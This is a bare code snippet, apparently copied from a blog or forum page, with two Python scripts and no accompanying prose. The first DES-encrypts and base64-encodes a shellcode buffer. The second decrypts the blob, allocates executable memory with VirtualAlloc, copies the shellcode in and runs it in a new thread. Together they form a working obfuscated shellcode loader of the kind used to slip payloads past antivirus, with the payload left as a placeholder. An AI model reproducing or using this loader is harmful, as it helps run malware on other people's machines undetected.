1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
| from Cryptodome.Cipher import DES import base64 buf = b"shellcode" key = b'DEADC0DE' des = DES.new(key, DES.MODE_ECB) pad = (8 - len(buf) % 8) * b"\x00" b64code = base64.b64encode(des.encrypt(buf + pad)) print(b64code) print(len(buf))
from Cryptodome.Cipher import DES import base64 import ctypes b64code = b"base64code" length = 510 key = b"DEADC0DE" des = DES.new(key, DES.MODE_ECB) buf = des.decrypt(base64.b64decode(b64code))[:length] shellcode = bytearray(buf) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
|